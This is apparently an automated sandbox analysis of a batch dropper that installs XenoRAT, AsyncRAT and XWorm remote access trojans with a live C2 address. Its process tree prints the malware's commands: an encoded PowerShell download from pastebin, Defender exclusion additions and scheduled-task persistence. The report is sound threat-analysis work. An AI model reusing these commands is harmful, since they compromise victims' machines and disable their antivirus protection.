Resubmissions

08-12-2024 23:35

241208-3k15zawkhx 10

08-12-2024 12:59

241208-p8a2ssypfk 10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    08-12-2024 12:59

General

  • Target

    LHVWN_virus_src.bat

  • Size

    680B

  • MD5

    28a24f08a62dc5c8af6be5e921d4c5ad

  • SHA1

    97f70c14a8e2ba4da9d8f5d65961d7d998ebb637

  • SHA256

    c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

  • SHA512

    e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Malware Config

Extracted

Family

xenorat

C2

82.13.154.169

Mutex

09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4444

  • startup_name

    svchost

Extracted

Family

asyncrat

Botnet

CompPkgSrv

C2

82.13.154.169:4444

Attributes
  • delay

    3

  • install

    true

  • install_file

    CompPkgSrv.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

82.13.154.169:4444

Attributes
  • Install_directory

    %AppData%

  • install_file

    CompPkgSup.exe

Signatures

  • AsyncRat

    AsyncRAT is written in C# and is designed to remotely monitor and control other computers.

  • Asyncrat family
  • Detect XenoRat Payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • XenoRat

    XenoRat is a remote access trojan written in C#.

  • Xenorat family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4284
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3716
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2416
            • C:\Users\Admin\AppData\Local\svchost.exe
              "C:\Users\Admin\AppData\Local\svchost.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4556
              • C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
                "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2432
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEC63.tmp" /F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2056
            • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
              "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4300
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1072
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4424
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEAFC.tmp.bat""
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2348
                • C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe
                  "C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1692
            • C:\Users\Admin\AppData\Local\CompPkgSup.exe
              "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
              6⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4088
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3992
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4132
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3868
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1660
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3096
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2368
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2916
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4848

Downloads

  • C:\Users\Admin\AppData\Local\CompPkgSrv.exe

    Filesize

    63KB

    MD5

    a2cc522bd3b0806748349c386d613b00

    SHA1

    36f14471d1e307eec0af563f5c884acbffe65284

    SHA256

    a68a6d746ffbaf79d5e43b140217f521d68efa0191f9630258c57faf9591b70d

    SHA512

    c5f108ecc7ef45b465f07f3441ad00682a9ef9caa25783af1acf00777e087e483071e323b311581ed94c3cbbf740b776a13f29374ef5c42f795e36a13c36c959

  • C:\Users\Admin\AppData\Local\CompPkgSup.exe

    Filesize

    80KB

    MD5

    82ae01d348fce7ddf9f19ca5cb545ae1

    SHA1

    5b563cec5b49c7ec4082bf19aeccce9fc190bd2a

    SHA256

    4a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d

    SHA512

    6a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSrv.exe.log

    Filesize

    871B

    MD5

    d58f949aad7df2e7b55248bfdfc6e1b8

    SHA1

    6713cad396b5808b66ede2dd9b169e00d5e5018f

    SHA256

    5e1611e4d915fd9759825811fa4463f09172889f85889a2942be1561948fab8a

    SHA512

    bdddb838108c4f3f0a7737703cbde935fe26aaea97459bb099c4c773c0789997283d7f20ac7ea4ac2aedef23515afc0b251b5b461aa12d3b7a60846b87b26e38

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSup.exe.log

    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

    Filesize

    226B

    MD5

    916851e072fbabc4796d8916c5131092

    SHA1

    d48a602229a690c512d5fdaf4c8d77547a88e7a2

    SHA256

    7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

    SHA512

    07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    a26df49623eff12a70a93f649776dab7

    SHA1

    efb53bd0df3ac34bd119adf8788127ad57e53803

    SHA256

    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

    SHA512

    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    f994815edea79688903f374b373848cc

    SHA1

    122c649520fa4e5f9ee602ead7748cab2448deb1

    SHA256

    63c62fe05e690671d433399df8565a0a99d6a9d9708fc8033b8d196b672ccda4

    SHA512

    b8e9e749a88a3b8f728fddcaf6353345e8e53b2a1fc8b06f182745907c53c106bf3a530846031619d9a6c2b94a7d0468d05389e84087f447e3f377154a9e12d3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6a5650126660a2760e93e48a63a9f626

    SHA1

    35710b657094c22ed66a37854173ce2090f02caa

    SHA256

    e981ba57e2617381d8d75f0c7ffb6e836afbeb475434a06b56b9a5a988761e92

    SHA512

    4e4cc9dc507cd95d5f9ddc181f68e97e5351aa7748c574717ac4cf0ff882f7fb1c6d6460b63560db382697c44118b8c2a288e2c94c9c8457b15ca6a9b1a66ba9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    7a2a96e13462c26cc9a2b0f1922d595a

    SHA1

    70e2adf4f820220f2e1d5b84a8c2f88857da10c4

    SHA256

    665e9e6b2fe31ff680ffdc4fd111028ae663d2a9d99c3ef5aa4158b9f88fb73b

    SHA512

    3db783999d0322e17decb6d6b090684467be1e933bd68dc17a62ca4b0c632e3464a23448c1c97e34d340d21223baa51846e066323f7ec47b955f1f7dc1dbe948

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    3ca1082427d7b2cd417d7c0b7fd95e4e

    SHA1

    b0482ff5b58ffff4f5242d77330b064190f269d3

    SHA256

    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

    SHA512

    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    94af78d295fb3dfe76397aa481c33845

    SHA1

    314f4100021ba93a64dd62fcb895d4d50b93af12

    SHA256

    328b9f28515a4c00fcf1f8432a0a965fcf5866b0bd7abbafd5a17c3e10802f61

    SHA512

    3f95a9ad4a4e8b923872fad42df64ba085f1ae95baedfb9dca857a6eb56ea9dd37437535d5efd6e778ac2ebdd26e963c2fc03969309d8bc2546f8eb2c949797a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pubphwsk.dmh.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmpEAFC.tmp.bat

    Filesize

    154B

    MD5

    94c663278061e050c99cd3729786f6a5

    SHA1

    770036f40565ee2dc7930da529796d8efd52e468

    SHA256

    b486b365bc64d8651298ae4ae426a8ceb1fceae0c108793ec11df5f6518a9f9f

    SHA512

    52a61fc4c4fce34f76cfed62c9e3fda357a96b506333c5e30ff7d2884c67c77daea5c99572723c18a68b8ef2c21c60e3ca0ad3f481b4e4c70a24ebedb0a9eeea

  • C:\Users\Admin\AppData\Local\Temp\tmpEC63.tmp

    Filesize

    1KB

    MD5

    9cb9f8ba5ba99c36d5ba7ee5a98f0bd9

    SHA1

    4bb53c5f5d4f208a4082b59b0c4b5185866cd874

    SHA256

    dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c

    SHA512

    eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76

  • C:\Users\Admin\AppData\Local\svchost.exe

    Filesize

    46KB

    MD5

    31ee6e006c02625385210da20ce4b522

    SHA1

    e13ae10bd9300fd4608f8fc697e789b9712c1a75

    SHA256

    35edd93f3f9f6e21c6d88e50e475960290dacbba2c8d19cb74bb1b85fde24c2c

    SHA512

    46aca18f2af78401b3d39c28b2d87de4d44c7661bbc4a129f0af840075ad2e2becf4d144fc98292efb909763543c64a4801f921c1b71232ac2cc4911224c77e4

  • C:\Users\Admin\AppData\Local\sysboot.ps1

    Filesize

    1KB

    MD5

    81f7df2e0aa206d331d8987c1035cef1

    SHA1

    51e8454a79b2f8127d96663c6a74f88b1f139f2a

    SHA256

    4d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a

    SHA512

    6defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d
